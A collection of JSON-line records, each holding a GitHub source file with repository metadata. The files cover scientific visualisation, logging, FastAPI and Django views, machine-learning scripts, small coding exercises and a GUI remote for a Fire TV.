+{"seq_id":"39389747348","text":"import numpy as np\nimport traitlets\nfrom yt.data_objects.data_containers import YTDataContainer\nfrom yt.utilities.lib.mesh_triangulation import triangulate_mesh\n\nfrom yt_idv.opengl_support import Texture3D, VertexArray, VertexAttribute\nfrom yt_idv.scene_data.base_data import SceneData\n\n\nclass MeshData(SceneData):\n    name = \"mesh\"\n    data_source = traitlets.Instance(YTDataContainer)\n    texture_objects = traitlets.Dict(trait=traitlets.Instance(Texture3D))\n    blocks = traitlets.Dict(default_value=())\n    scale = traitlets.Bool(False)\n    size = traitlets.CInt(-1)\n\n    def get_mesh_data(self, data_source, field):\n        \"\"\"\n\n        This reads the mesh data into a form that can be fed in to OpenGL.\n\n        \"\"\"\n\n        # get mesh information\n        try:\n            ftype, fname = field\n            mesh_id = int(ftype[-1])\n        except ValueError:\n            mesh_id = 0\n\n        mesh = data_source.ds.index.meshes[mesh_id - 1]\n        offset = mesh._index_offset\n        vertices = mesh.connectivity_coords\n        if hasattr(vertices, \"in_units\"):\n            vertices = vertices.in_units(\"unitary\")\n        indices = mesh.connectivity_indices - offset\n\n        data = data_source[field]\n\n        return triangulate_mesh(vertices, data, indices)\n\n    def add_data(self, field):\n        v, d, i = self.get_mesh_data(self.data_source, field)\n        v.shape = (v.size // 3, 3)\n        v = np.concatenate([v, np.ones((v.shape[0], 1))], axis=-1).astype(\"f4\")\n        d.shape = (d.size, 1)\n        i.shape = (i.size, 1)\n        i = i.astype(\"uint32\")\n        # d[:] = np.mgrid[0.0:1.0:1j*d.size].astype(\"f4\")[:,None]\n        self.vertex_array.attributes.append(\n            VertexAttribute(name=\"model_vertex\", data=v)\n        )\n        self.vertex_array.attributes.append(\n            VertexAttribute(name=\"vertex_data\", data=d.astype(\"f4\"))\n        )\n        self.vertex_array.indices = i\n        self.size = i.size\n\n    @traitlets.default(\"vertex_array\")\n    def _default_vertex_array(self):\n        return VertexArray(name=\"mesh_info\", each=0)\n","repo_name":"yt-project/yt_idv","sub_path":"yt_idv/scene_data/mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"76"}
+{"seq_id":"18827677800","text":"# log types are ( debug, info, warning, error and critical)\n# logs can be displayed on terminal or .log file\n\n# first import logging module :\nimport logging\n\n# second explore everything inside it :\n# print(dir(logging))\n\n# logging.basicConfig(filename=\"\", filemode=\"\", format=\"\", 
datefmt=\"\")\n\nlogging.basicConfig(filename=\"firstLog.log\", filemode=\"a\", format=\"logger_name = %(name)s, time = %(asctime)s, level_name = %(levelname)s, message = %(message)s\", datefmt=\"%d %B %Y, %H:%M:%S\", level=logging.WARNING)\n\n# debug message :\nlogging.debug(\"this is DEBUG message!\") # this will not appear because system doesn't care about debug or info\nlogging.info(\"this is info message!\") # same here , system doesn't care about info\n\nlogging.warning(\"this is warning message!\")\nlogging.error(\"this is error message!\")\nlogging.critical(\"this is critical message!\")\n# all the above 3 line will output this: ( of course with different names => warning, error and critical)\n# logger_name = root, time = 20 December 2022, 13:28, level_name = CRITICAL, message = this is critical message!\n\nmy_first_logger = logging.getLogger(\"instead_of_root\")\nmy_first_logger.error(\"this is my custom error message for my first logger\")","repo_name":"shiccorama/python_references","sub_path":"how_to_log_in_python.py","file_name":"how_to_log_in_python.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30918057733","text":"from expkit.docs.utils import mkdocs_macro\n\n\n@mkdocs_macro\ndef escape_markdown(string: any) -> str:\n result = \"\"\n string = f\"{string}\"\n for c in string:\n result += f\"\\\\{c}\"\n return result\n\n\n@mkdocs_macro\ndef markdown_anchor(string: any) -> str:\n return string.lower().replace(\".\", \"\").replace(\" \", \"-\")\n","repo_name":"0xCCF4/ExpKit","sub_path":"expkit/docs/macros/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"77"} +{"seq_id":"43814633202","text":"#!/usr/bin/python3\nimport pathlib\nimport pygubu\nimport os\nPROJECT_PATH = pathlib.Path(__file__).parent\nPROJECT_UI = PROJECT_PATH / \"migui.ui\"\nTEMPTXT = \"D:/temp.txt\"\n\nclass MiguiApp:\n def __init__(self, master=None):\n self.builder = builder = pygubu.Builder()\n builder.add_resource_path(PROJECT_PATH)\n builder.add_from_file(PROJECT_UI)\n # Main widget\n self.mainwindow = builder.get_object(\"toplevel1\", master)\n builder.connect_callbacks(self)\n\n self.taPathTutorial = builder.get_object(\"taPathTutorial\")\n self.lblDebugMsg = builder.get_object(\"lblDebugMsg\")\n\n import psutil\n if not \"Audacity.exe\" in (i.name() for i in psutil.process_iter()):\n self.lblDebugMsg.config(text = \"Audacity is not opened !!\")\n\n def run(self):\n self.mainwindow.mainloop()\n\n def batch_fix_audios(self):\n import tmptxt\n tmptxt.VIDSPATH = self.taPathTutorial.get() #.replace('\\\\','/')\n tmptxt.main()\n \n def clean_temp_txt(self):\n if os.stat(TEMPTXT).st_size == 0:\n os.remove(\"D:/temp.txt\")\n self.lblDebugMsg.config(text = \"temp.txt fue borrado\")\n else:\n self.lblDebugMsg.config(text = \"temp.txt not empty!!\")\n\n def crear_temp_txt(self):\n with open(TEMPTXT, 'w')as fp:\n pass\n self.lblDebugMsg.config(text = \"temp.txt fue creado\")\n lNombres = []\n for root, dirs, files in os.walk(self.taPathTutorial.get()):\n for filename in files:\n if os.path.splitext(filename)[1] == '.mp4':\n elpath = os.path.join(root, filename)\n if \" \" in elpath:\n self.lblDebugMsg.config(text = \"Err: space in name\")\n break\n lNombres.append(elpath)\n import tmptxt\n tmptxt.write_temptxt(lNombres)\n\nif __name__ == \"__main__\":\n app = MiguiApp()\n app.run()\n 
","repo_name":"apaza610/BatchFixAudios","sub_path":"miguiapp.py","file_name":"miguiapp.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22244031674","text":"from __future__ import annotations\n\nimport dataclasses\nimport re\nimport typing\n\nfrom pgquery.builder.actor import BuildingPayload\nfrom pgquery.builder.clause import Renderable, double_quoted\nfrom pgquery.builder.impl.column import BaseColumn, ColumnData\nfrom pgquery.builder.impl.select import Select, SelectableMixin\nfrom pgquery.builder.impl.tokens import PGToken\n\n# Pattern for converting CamelCase to snake_case\n_camel2snake_convert_pattern = pattern = re.compile(r\"(? None:\n payload.buffer << double_quoted(cls.__table_preferences__.name)\n\n @classmethod\n def select(cls, schema, **aliased_values) -> Select:\n return SelectableMixin.select(cls, schema, **aliased_values)\n\n @classmethod\n def create(cls) -> CreateTable:\n return CreateTable(table=cls)\n\n @classmethod\n def _parse_columns(cls) -> typing.Generator[ColumnData, None, None]:\n for class_var_name, class_var_value in vars(cls).items():\n if isinstance(class_var_value, BaseColumn):\n full_column_data = ColumnData(\n name=class_var_name, schema=class_var_value, table=cls\n )\n class_var_value.column_data = full_column_data\n yield full_column_data\n\n @classmethod\n def _build_table_name(cls, name: typing.Optional[str]) -> str:\n return _camel2snake_convert_pattern.sub(\n \"_\", name or cls.__name__\n ).lower()\n\n\n@dataclasses.dataclass\nclass CreateTable(Renderable):\n\n table: typing.Type[Table]\n\n def render(self, payload: BuildingPayload) -> None:\n payload.buffer << PGToken.CREATE_TABLE\n if self.table.__table_preferences__.if_not_exist:\n payload.buffer << PGToken.WHITESPACE\n payload.buffer << PGToken.IF_NOT_EXIST\n\n # Render table name\n payload.buffer << PGToken.WHITESPACE\n payload.buffer << self.table.__table_preferences__.name\n payload.buffer << PGToken.LEFT_PARENTHESIS\n\n columns_count = len(self.table.__table_columns__)\n for ind, column in enumerate(self.table.__table_columns__):\n column.render_for_table_creation(payload)\n # != Last column\n if columns_count - 1 != ind:\n payload.buffer << PGToken.COMMA\n\n payload.buffer << PGToken.RIGHT_PARENTHESIS\n","repo_name":"deknowny/pgquery","sub_path":"pgquery_old/builder/impl/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"45598482555","text":"def solution(n):\n answer = 1\n if n==1:\n return 1\n elif n==2:\n return 2\n for i in range(1,n+1):\n answer*=i\n \n if answer>n:\n return i-1","repo_name":"SeongjinLee00/Baekjoon","sub_path":"프로그래머스/unrated/120848. 
팩토리얼/팩토리얼.py","file_name":"팩토리얼.py","file_ext":"py","file_size_in_byte":187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27935307767","text":"from fastapi import APIRouter, HTTPException, Depends\nfrom app.services.users import UserService\nfrom app.dependensies import rete_limit_check\nfrom app.schemas.users import FullProfileInfo, UserProfileInfo, FullProfileInfos, CreateUserResponse\nimport logging\nfrom fastapi.responses import Response\nfrom fastapi import status\nfrom app.clients.db import DatabaseClient\n\nloger = logging.getLogger(__name__)\n\n\ndef create_user_router(database_client: DatabaseClient) -> APIRouter:\n user_router = APIRouter(\n prefix=\"/user\",\n tags=[\"users\"],\n dependencies=[Depends(rete_limit_check)]\n )\n users_service = UserService(database_client)\n\n @user_router.get(\"/dummy\")\n async def get_dummy() -> Response:\n resource = Response()\n resource.status_code=status.HTTP_204_NO_CONTENT\n return resource\n\n @user_router.get(\"/all\", response_model=FullProfileInfos)\n async def get_list_of_users_paginated(start: int = 0, limit: int = 2):\n\n users, total = await users_service.get_list_of_users_with_pagenetion(start, limit)\n formatted_users = FullProfileInfos(users = users, total = total)\n\n return formatted_users\n\n @user_router.get(\"/{user_id}\", response_model=FullProfileInfo)\n async def get_user_by_id(user_id: int):\n loger.info(\"Enter function get_user_by_id\")\n try:\n full_profile_info = await users_service.get_user_info(user_id)\n except KeyError:\n loger.error(f\"User with {user_id} does not existing\")\n raise HTTPException(status_code=404, detail={\"message\":\"User does not exists\", \"user_id\":user_id})\n return full_profile_info\n\n @user_router.patch(\"/{user_id}\", response_model=FullProfileInfo)\n async def update_user(user_id: int, user_profile_info: UserProfileInfo):\n \"\"\"\n Update some information about user\n\n :param user_id: int unique Id for updated user\n :param user_profile_info: UserProfileInfo - user's profile information\n :return: FullProfileInfo - full user's profile\n \"\"\"\n await users_service.update_profile(user_profile_info, user_id)\n full_profile_info = await users_service.get_user_info(user_id)\n return full_profile_info\n\n @user_router.put(\"/{user_id}\", response_model=CreateUserResponse)\n async def update_user(user_id: int, full_profile_info: FullProfileInfo):\n user_id = await users_service.create_update_user(full_profile_info, user_id)\n create_user_response = CreateUserResponse(user_id=user_id)\n return create_user_response\n\n @user_router.delete(\"/{user_id}\")\n async def remove_user(user_id: int):\n try:\n await users_service.delete_user_by_id(user_id)\n return None\n except KeyError:\n raise HTTPException(status_code=404, detail={\"message\":\"User does not exists\", \"user_id\":user_id})\n\n @user_router.post(\"/\", response_model=CreateUserResponse, status_code=201)\n async def post_user(full_profile_info: FullProfileInfo):\n new_user_id = await users_service.create_user(full_profile_info)\n create_user_response = CreateUserResponse(user_id=new_user_id)\n return create_user_response\n\n @user_router.on_event(\"startup\")\n async def database_connect():\n await database_client.database.connect()\n\n @user_router.on_event(\"shutdown\")\n async def database_disconnect():\n await database_client.database.disconnect()\n\n return 
user_router\n","repo_name":"WhieAsh/PythonTemplateProject","sub_path":"app/routes/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33348244081","text":"# number of days in month by years\nmonth_days = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\ndef is_leap(year):\n \"\"\"Returns True if leap year otherwise False.\"\"\"\n \n return year % 4 == 0 and (year % 200 != 0 or year % 400 == 0)\n\ndef days_in_month(year, month):\n \"\"\"Return number of days in that month of year.\"\"\"\n\n if not 1 <= month <= 12:\n return 'Invalid Month' \n \n if month == 2 and is_leap(year):\n return 29\n\n return month_days[month]\n\nprint(days_in_month(2021, 2))","repo_name":"iwantroca/PythonNotes","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18758994111","text":"import pandas as pd\r\nimport numpy as np\r\nfrom sklearn.preprocessing import label_binarize, StandardScaler\r\nfrom sklearn import svm\r\nfrom sklearn.model_selection import GroupShuffleSplit\r\nfrom sklearn.metrics import roc_curve, auc\r\nfrom sklearn.multiclass import OneVsRestClassifier\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.pipeline import make_pipeline\r\nfrom imblearn.over_sampling import SMOTE\r\nimport matplotlib.pyplot as plt\r\nfrom itertools import cycle\r\n\r\n# Read dataframe\r\ndf = pd.read_csv('./results/2D/radiomic_features_2D.csv', skipinitialspace=True, na_values='scalar', index_col=0)\r\n\r\n# Get X, y variables\r\ny = df['Grade']\r\nX = df.drop(['Grade'], axis=1)\r\n\r\n# Group: to ensure that the same case is not represented in both testing and training sets\r\ncases = X['CaseNumber']\r\ncases_group_shuffle = GroupShuffleSplit(n_splits=2, test_size=.2, random_state=0)\r\n\r\nfor train_index, test_index in cases_group_shuffle.split(X, y, cases):\r\n X_train, X_test = X.iloc[train_index], X.iloc[test_index]\r\n y_train, y_test = y[train_index], y[test_index]\r\n\r\n# Balance dataset with SMOTE\r\nX_train, y_train = SMOTE().fit_resample(X_train, y_train)\r\n\r\n# Binarize y for ovr\r\ny_train = label_binarize(y_train, classes=[0, 1, 2])\r\ny_test = label_binarize(y_test, classes=[0, 1, 2])\r\nn_classes = y_train.shape[1]\r\n\r\n# Remove CaseNumber from X\r\nX_train = X_train.drop(['CaseNumber'], axis=1)\r\nX_test = X_test.drop(['CaseNumber'], axis=1)\r\n\r\n# Build pipeline with StandardScaler, PCA and Ovr classifier and compute score\r\nclf = make_pipeline(\r\n StandardScaler(), \r\n PCA(n_components=18), \r\n OneVsRestClassifier(svm.SVC(kernel='linear'))\r\n )\r\ny_score = clf.fit(X_train, y_train).decision_function(X_test)\r\n\r\n# Compute ROC curve and ROC area for each class\r\nfpr = dict()\r\ntpr = dict()\r\nroc_auc = dict()\r\nfor i in range(n_classes):\r\n fpr[i], tpr[i], _ = roc_curve(y_test[:, i], y_score[:, i])\r\n roc_auc[i] = auc(fpr[i], tpr[i])\r\n\r\n# Compute micro-average ROC curve and ROC area\r\nfpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_test.ravel(), y_score.ravel())\r\nroc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\r\n\r\nlw = 2\r\n\r\n## ROC curves for the multilabel problem\r\n# First aggregate all false positive rates\r\nall_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))\r\n\r\n# Then interpolate all ROC curves at this points\r\nmean_tpr = 
np.zeros_like(all_fpr)\r\nfor i in range(n_classes):\r\n mean_tpr += np.interp(all_fpr, fpr[i], tpr[i])\r\n\r\n# Finally average it and compute AUC\r\nmean_tpr /= n_classes\r\n\r\nfpr[\"macro\"] = all_fpr\r\ntpr[\"macro\"] = mean_tpr\r\nroc_auc[\"macro\"] = auc(fpr[\"macro\"], tpr[\"macro\"])\r\n\r\n# Plot all ROC curves\r\nplt.figure()\r\nplt.plot(fpr[\"micro\"], tpr[\"micro\"], label='micro-average ROC curve (area = {0:0.2f})'''.format(roc_auc[\"micro\"]),color='deeppink', linestyle=':', linewidth=4)\r\nplt.plot(fpr[\"macro\"], tpr[\"macro\"],label='macro-average ROC curve (area = {0:0.2f})'''.format(roc_auc[\"macro\"]),color='navy', linestyle=':', linewidth=4)\r\ncolors = cycle(['aqua', 'darkorange', 'cornflowerblue'])\r\n\r\nfor i, color in zip(range(n_classes), colors):\r\n plt.plot(fpr[i], tpr[i], color=color, lw=lw,label='ROC curve of class {0} (area = {1:0.2f})'''.format(i, roc_auc[i]))\r\n\r\nplt.plot([0, 1], [0, 1], 'k--', lw=lw)\r\nplt.xlim([0.0, 1.0])\r\nplt.ylim([0.0, 1.05])\r\nplt.xlabel('False Positive Rate')\r\nplt.ylabel('True Positive Rate')\r\nplt.title('Slice Features')\r\nplt.legend(loc=\"lower right\")\r\nplt.show()\r\n","repo_name":"brumendes/radiomics","sub_path":"classifier_ovr_slices.py","file_name":"classifier_ovr_slices.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29435969953","text":"'''\nImplements the template mechanism used for translating templates to\nthe corresponding output documents.\n'''\n\nimport importlib\nimport os\nimport os.path\n\nfrom bibPublish.entry import Entry\n\nTEMPLATE_PATH = 'bibPublish.templates.'\n\n\nclass Template():\n\n def __init__(self, template_name, bibtex_entries, output_dir):\n self.template = importlib.import_module(TEMPLATE_PATH + template_name)\n self.bibtex_entries = bibtex_entries\n\n # setup output infrastructure\n self.output_dir = output_dir\n if not os.path.exists(self.output_dir):\n os.makedirs(self.output_dir)\n\n # setup infrastructure for supplemental material\n self.supplemental_material = self.template.SupplementalMaterial(\n output_dir)\n\n def _load_template(self, section, template_type):\n return open(os.path.join(self.template.TEMPLATE_PATH,\n section + template_type)).read()\n\n def _get_relevant_entries(self, section):\n return sorted([entry for entry in self.bibtex_entries\n if entry['ENTRYTYPE'] == section],\n key=lambda x: x['year'],\n reverse=True)\n\n def generate_section(self, section):\n output = [self._load_template(section, '-head.tmpl')]\n entry_template = self._load_template(section, '-entry.tmpl')\n for entry in self._get_relevant_entries(section):\n entry = Entry(self.template).format_entry(entry)\n output.append(entry_template.format(**entry))\n\n # set citation key\n entry['citation'] = entry['entry_' + section]\n self.supplemental_material.generate(entry)\n output.append(self._load_template(section, '-foot.tmpl'))\n return output\n\n def generate_output(self):\n output = [self._load_template('', 'head.tmpl')]\n for section in self.template.ENTRY_ORDER:\n output.extend(self.generate_section(section))\n output.append(self._load_template('', 'foot.tmpl'))\n\n with open(os.path.join(self.output_dir,\n self.template.OUTFILE), 'w') as f:\n f.write('\\n'.join(output).replace(' . ', '. 
'))\n","repo_name":"AlbertWeichselbraun/bibPublish","sub_path":"src/bibPublish/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11578421138","text":"\"\"\"\nAuthor: William Meira\nDate: 2020-05-07\nPlatform: HackerRank\nType: Interview\nLevel: Easy\nLink: https://www.hackerrank.com/challenges/2d-array/\n\"\"\"\n\n\nimport os\n\n\ndef hourglass_sum(arr):\n return max([arr[row - 1][col - 1]\n + arr[row - 1][col]\n + arr[row - 1][col + 1]\n + arr[row][col]\n + arr[row + 1][col - 1]\n + arr[row + 1][col]\n + arr[row + 1][col + 1]\n for row in range(1, 5) for col in range(1, 5)])\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n arr = []\n\n for _ in range(6):\n arr.append(list(map(int, input().rstrip().split())))\n\n result = hourglass_sum(arr)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"wmeira/prog-problems","sub_path":"HackerRank/challenges/interview/arrays/2d-array.py","file_name":"2d-array.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"36962008913","text":"from tkinter import *\r\nimport FireTVConnect as firetv\r\ntv=firetv.Connector(\"192.168.1.73\")\r\ntv.Reset()\r\ntv.Connect()\r\ndef test():\r\n print(\"test\")\r\ndef up():\r\n tv.KeyEvent(\"Up\")\r\ndef down():\r\n tv.KeyEvent(\"Down\")\r\ndef select():\r\n tv.KeyEvent(\"Enter\")\r\ndef right():\r\n tv.KeyEvent(\"Right\")\r\ndef left():\r\n tv.KeyEvent(\"Left\")\r\ndef home():\r\n tv.KeyEvent(\"Home\")\r\ndef back():\r\n tv.KeyEvent(\"back\")\r\ndef forward():\r\n tv.KeyEvent(\"forward\")\r\nroot = Tk() \r\nframe = Frame(root) \r\nframe.pack() \r\nbottomframe = Frame(root) \r\nbottomframe.pack( side = BOTTOM ) \r\nredbutton = Button(frame, text = 'Up', fg ='green',command=up) \r\nredbutton.pack( side = TOP) \r\ngreenbutton = Button(frame, text = 'Left', fg ='red',command=left) \r\ngreenbutton.pack( side = LEFT) \r\nbrownbutton = Button(frame, text = 'Select', fg='brown',command=select) \r\nbrownbutton.pack( side = LEFT ) \r\nbluebutton = Button(frame, text ='Right', fg ='blue',command=right) \r\nbluebutton.pack( side = LEFT )\r\nfwbut = Button(bottomframe, text ='FFW', fg ='black',command=forward) \r\nfwbut.pack( side = RIGHT)\r\nplaybut = Button(bottomframe, text ='Play/Pause', fg ='red',command=back) \r\nplaybut.pack( side = BOTTOM) \r\nrevbut = Button(bottomframe, text ='REV', fg ='black',command=back) \r\nrevbut.pack( side = LEFT)\r\nhomebutt = Button(bottomframe, text ='Home', fg ='blue',command=home) \r\nhomebutt.pack( side = BOTTOM)\r\nblackbutton = Button(bottomframe, text ='Down', fg ='black',command=down) \r\nblackbutton.pack( side = BOTTOM)\r\n\r\n\r\n\r\n\r\nroot.mainloop() \r\n","repo_name":"zapinator3000/FireTVConnect","sub_path":"FireTVConnect/remote.py","file_name":"remote.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"29399730319","text":"def palindromo(palabra):\n i=0\n l=len(palabra)-1\n while i<=1:\n if palabra[i]!=palabra[l-i]:\n return False\n i=i+1\n return True\nif __name__==\"__main__\":\n print(palindromo(\"oso\"))\n print(palindromo(\"dinosaurio\"))\n 
","repo_name":"pabloschwarzenberg/grader","sub_path":"tema11_ej1/tema11_ej1_df575c560b82c8b84c9e89a4cf76be6a.py","file_name":"tema11_ej1_df575c560b82c8b84c9e89a4cf76be6a.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26966714034","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect\nfrom .forms import UpdateProfile, UpdateUser\nfrom django.contrib import messages\nfrom .forms import CreateProfile\nfrom .models import Profile\n\n\n@login_required\ndef profile(request):\n if request.method == 'POST':\n u_form = UpdateUser(request.POST, instance=request.user)\n p_form = UpdateProfile(request.POST, request.FILES, instance=request.user.profile)\n if u_form.is_valid() and p_form.is_valid():\n u_form.save()\n p_form.save()\n messages.success(request, 'Information has been updated successfully')\n return redirect('profile')\n else:\n u_form = UpdateUser(instance=request.user)\n p_form = UpdateProfile(request.FILES, instance=request.user.profile)\n\n context = {\n 'u_form': u_form,\n 'p_form': p_form\n }\n path = 'users/profile.html'\n return render(request, path, context)\n\n\ndef register(request):\n if request.method == 'POST':\n form = CreateProfile(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n messages.success(request, f'Account has been created successfully for {username}. Please, proceed to Login ')\n return redirect('home')\n\n else:\n form = CreateProfile()\n\n path = 'users/register.html'\n return render(request, path, {'form': form})\n\n","repo_name":"shkhryr/my-blog","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73061418809","text":"import numpy as np\nimport tensorflow as tf\n#tf.enable_eager_execution()\n\ndef getHeadSelectionScores(encode_input, hidden_size_n1, predicate_number):\n def broadcasting(left, right):\n left = tf.transpose(left, perm=[1, 0, 2])\n left = tf.expand_dims(left, 3)\n right = tf.transpose(right, perm=[0, 2, 1])\n right = tf.expand_dims(right, 0)\n B = left + right\n B = tf.transpose(B, perm=[1, 0, 3, 2])\n return B\n encode_input_hidden_size = encode_input.shape[-1].value\n u_a = tf.get_variable(\"u_a\", [encode_input_hidden_size, hidden_size_n1])\n w_a = tf.get_variable(\"w_a\", [encode_input_hidden_size, hidden_size_n1])\n v = tf.get_variable(\"v\", [hidden_size_n1, predicate_number])\n b_s = tf.get_variable(\"b_s\", [hidden_size_n1])\n\n left = tf.einsum('aij,jk->aik', encode_input, u_a)\n right = tf.einsum('aij,jk->aik', encode_input, w_a)\n outer_sum = broadcasting(left, right)\n outer_sum_bias = outer_sum + b_s\n output = tf.tanh(outer_sum_bias)\n g = tf.einsum('aijk,kp->aijp', output, v)\n return g\n\nbatch_size = 2\nsequnce_length = 3\ninit_dimension = 5\nheadselection_mid_level_dimension = 7\npredicate_label_number = 4\ninput_mask = tf.constant([[1, 1, 0], [1, 1, 0]])\n\nsequnce_mask_length = tf.reduce_mean(tf.cast(input_mask, tf.float32)) * sequnce_length\nsequnce_mask_length = tf.cast(sequnce_mask_length, tf.int32)\nprint(\"sequnce_mask_length:\\t\", sequnce_mask_length)\n\nencode_input = tf.constant(np.random.random(size=(batch_size, sequnce_length, init_dimension)), dtype=tf.float32)\nprint(\"encode_input:\\t\", encode_input)\n\nhead_select_scores_matrix = 
getHeadSelectionScores(encode_input, headselection_mid_level_dimension, predicate_label_number)\nprint(\"head_select_scores_matrix:\\t\", head_select_scores_matrix)\n\n#predicate_head_predictions = tf.argmax(head_select_scores_matrix, axis=-1)\n#print(\"predicate_head_predictions:\\t\", predicate_head_predictions)\nhead_select_scores_matrix_N_predicate = head_select_scores_matrix[:,0:sequnce_mask_length, 0:sequnce_mask_length, 0:1]\nprint(\"head_select_scores_matrix_N_predicate:\\t\", head_select_scores_matrix_N_predicate)\nhead_select_scores_matrix_N_predicate_sum = tf.reduce_sum(head_select_scores_matrix_N_predicate)\nprint(\"head_select_scores_matrix_N_predicate_sum:\\t\", head_select_scores_matrix_N_predicate_sum)\n\nhead_select_sigmoid_scores_matrix = tf.nn.sigmoid(head_select_scores_matrix)\nprint(\"head_select_sigmoid_scores_matrix:\\t\", head_select_sigmoid_scores_matrix)\npredicate_head_predictions = tf.round(head_select_sigmoid_scores_matrix)\npredicate_head_predictions = tf.cast(predicate_head_predictions, tf.int32)\nprint(\"predicate_head_predictions:\\t\", predicate_head_predictions)\n\n\ngold_label = tf.constant(np.random.randint(0, predicate_label_number, size=(batch_size, sequnce_length, sequnce_length)), dtype=tf.int32)\nprint(\"gold_label:\\t\", gold_label)\ngold_label_one_hot = tf.one_hot(gold_label, depth=predicate_label_number, dtype=tf.float32)\nprint(\"gold_label_one_hot:\\t\", gold_label_one_hot)\n\nhead_select_scores_matrix_masked = head_select_scores_matrix[:, 0:sequnce_mask_length, 0:sequnce_mask_length, :]\ngold_label_one_hot_masked = gold_label_one_hot[:, 0:sequnce_mask_length, 0:sequnce_mask_length, :]\nprint(\"head_select_scores_matrix_masked:\\t\", head_select_scores_matrix_masked)\nprint(\"gold_label_one_hot_masked:\\t\", gold_label_one_hot_masked)\n\nsigmoid_cross_entropy_with_logits_masked = tf.nn.sigmoid_cross_entropy_with_logits(logits=head_select_scores_matrix_masked, labels=gold_label_one_hot_masked)\nprint(\"sigmoid_cross_entropy_with_logits_masked:\\t\", sigmoid_cross_entropy_with_logits_masked)\n\n\n\nhead_select_loss_masked = tf.reduce_sum(sigmoid_cross_entropy_with_logits_masked)\nprint(\"head_select_loss_masked:\\t\", head_select_loss_masked)\n\nhead_select_loss_add_N = head_select_loss_masked + head_select_scores_matrix_N_predicate_sum","repo_name":"yuanxiaosc/Multiple-Relations-Extraction-Only-Look-Once","sub_path":"bin/test_head_select_scores.py","file_name":"test_head_select_scores.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","stars":342,"dataset":"github-code","pt":"77"} +{"seq_id":"22510971136","text":"import unittest\n\nimport sys\n\n\n# class MyTestCase(unittest.TestCase):\n#\n# @unittest.skip(\"demonstrating skipping\")\n# def test_nothing(self):\n# print(\"test nothing\")\n# self.fail(\"shouldn't happen\")\n#\n# # @unittest.skipIf(mylib.__version__ < (1, 3),\n# # \"not supported in this library version\")\n# # def test_format(self):\n# # # Tests that work for only a certain version of the library.\n# # pass\n#\n# @unittest.skipUnless(sys.platform.startswith(\"win\"), \"requires Windows\")\n# def test_windows_support(self):\n# # windows specific testing code\n# print(\"test_windows_support\")\n# pass\n#\n# # def test_maybe_skipped(self):\n# # if not external_resource_available():\n# # self.skipTest(\"external resource not available\")\n# # # test code that depends on the external resource\n# # pass\nclass suiteTest(unittest.TestCase):\n a = 50\n b = 40\n\n def test_add(self):\n 
\"\"\"Add\"\"\"\n result = self.a + self.b\n print(\"add\")\n self.assertEqual(result, 100)\n\n @unittest.skipIf(a > b, \"Skip over this routine\")\n def test_sub(self):\n \"\"\"sub\"\"\"\n result = self.a - self.b\n self.assertTrue(result == -10)\n\n @unittest.skipUnless(b == 0, \"Skip over this routine\")\n def test_div(self):\n \"\"\"div\"\"\"\n result = self.a / self.b\n self.assertTrue(result == 1)\n\n @unittest.expectedFailure\n def test_mul(self):\n \"\"\"mul\"\"\"\n result = self.a * self.b\n self.assertNotEqual(result, 2000)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"AnushkaSingh21/pytest","sub_path":"testpy/tests/test_skip.py","file_name":"test_skip.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31458363108","text":"import sys\nfrom api.src.server.instance import server\nfrom api.src.controller import (\n CreateTransaction, \n GetMemoryPoolTransactions,\n GetChain,\n MineBlock,\n ResolveConflicts,\n CreateNode\n)\n\n\nport = sys.argv[1] if len(sys.argv) > 1 else 